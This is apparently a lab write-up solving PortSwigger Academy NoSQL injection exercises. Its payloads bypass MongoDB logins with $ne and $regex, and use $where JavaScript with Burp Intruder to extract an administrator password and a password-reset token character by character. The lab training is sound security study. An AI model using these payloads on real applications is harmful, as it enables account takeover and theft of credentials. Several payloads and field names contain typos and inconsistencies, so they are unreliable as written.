NoSQL Injection Portswigger
Answers from NoSQL Injection Labs in Portswigger Academy.
Last updated
Was this helpful?
Answers from NoSQL Injection Labs in Portswigger Academy.
Last updated
Was this helpful?
Objective : perform a NoSQL injection attack that causes the application to display unreleased products.
Let's start by the basic single quote ' to check how the app react. As the payload is in the url we'll have to encore it, we can use the Decoder tool from burp.
Gifts'
%47%69%66%74%73%27%
It gave us a javascript syntax error.
Now let's identify whether we can inject boolean conditions to change response (don't forget to translate payload in URL with encoder) :
Gifts' && 0 && 'x
Gifts' && 1 && 'x
When the condition is true we can retrieve items.
Now let's submit a payload who will always be true in the category filter :
Gifts'||1||'
This will allow us to retrieve all products.
Objective : log into the application as the administrator user. The database used is MongoDB.
Some operator for injection :
$where - Matches documents that satisfy a JavaScript expression.
$ne - Matches all values that are not equal to a specified value.
$in - Matches all of the values specified in an array.
$regex - Selects documents where values match a specified regular expression.
If submitting query operatos in URL doesn't work, we can try to change our http methode to POST, change Content-type to application/json and then manipulate the json in the message body.
Example of json snipped about users :
{"username":"wiener","password":"peter"}
Let's connect with the given credentials and analyze what happened
We can see there is a json object in our request.
Now let's manipulate it with the given operators.
First, we could check if $ne can bypass the password.
{"username":"wiener","password":{ "$ne":""}}
This payload look for user "wiener" and a password not equal to " ", which is true, and it gave us a 302 response with the Location: /my-account?id=wiener
That's means we successfully logged in as wiener without a password.
Now we could simply replace wiener by administrator to login as admin.
We couldn't connect, that's means administrator username doesn't exist. We can use regex operator to see which account match a certain string.
We instantly got the access, our query found a matching username and made the request.
{"username":{ "$regex":"admin*" },"password":{ "$ne":""}}
We're now logged in as " admin14g9ujj5 ", the labs is solved.
Objective : extract the password for the administrator user, then log in to their account.
First, let's find some interesting request to manipulate. Note we can see here we have a json response with sensitive data related to the user.
Let's change is a bit so we can do stuff linked to administrator.
Now let's understand the logic behind and see what happens when we just add a single quote :
We go an error, let's check what happens it we comment the rest of query, if that work, a NoSQL injection are definitely available
'&&1=='1
Not let's find the password length :
'%26%26this.password.lenghth=='1
Automate it with Intruder :
Great, now we know the length we can think about a way to discover the password.
administrator'%26%26this.password[1]=='a
This payload will check if the first char from password is equal to "a"'.
Let's automate it, with intruder, like previous labs.
Great, we have the password kkmxxenb and we can login as administrator.
Goal : Log in as Carlos
Hint : Exfiltrate the value of the password reset token for the user Carlos
First, let's try previous $ne query logic, we see the application return a new error " Account blocked " , that's means our query been proceeded and accepted.
We can use $whereto know if the application is vulnerable to Javascript injection.
$where operator is used to pass either a string containing a JavaScript expression or a full JavaScript function to query system.
We'll try 2 payloads, one true one false, to see difference between responses.
{"username":"carlos", "password":{"$ne":""}, "$where":"0" }
{"username":"carlos", "password":{"$ne":""}, "$where":"1" }
We can tell the application react differently, so it's vulnerable to Javascript.
Now, we know that all MongoDB document start with _id, let's confirm it with a Javascript snippet :
{"username":"carlos", "password":{"$ne":""}, "$where":"function() {if (Object.keys(this)[0].match('_id')) return 1; else 0; }" }
We have the output " Account locked " means our query is true.
Now we could check for the hidden field name and length. First let's check for his length :
{"username":"carlos", "password":{"$ne":""}, "$where":"function() {if (Object.keys(this)[4].length == Β§1Β§) return 1; else 0; }" }
Running it in intruder, we got a length of 9.
Now let's check for the name :
{"username":"carlos", "password":{"$ne":""}, "$where":"function() {if (Object.keys(this)[4].match(/^a/) ) return 1; else 0; }" }
After doing it for the 9 char we got the string "NewPwdTkn" Now, let's define the length of email, which seems to be 25.
{"username":"carlos", "password":{"$ne":""}, "$where":"function() { if(this.newPwdTkn.length == Β§1Β§ ) return 1; else 0; }" }
Now let's find all character with the previous methodology.
{"username":"carlos", "password":{"$ne":""}, "$where":"function() { if(this.email.match(^a/)) return 1; else 0; }" }
First one is "c".
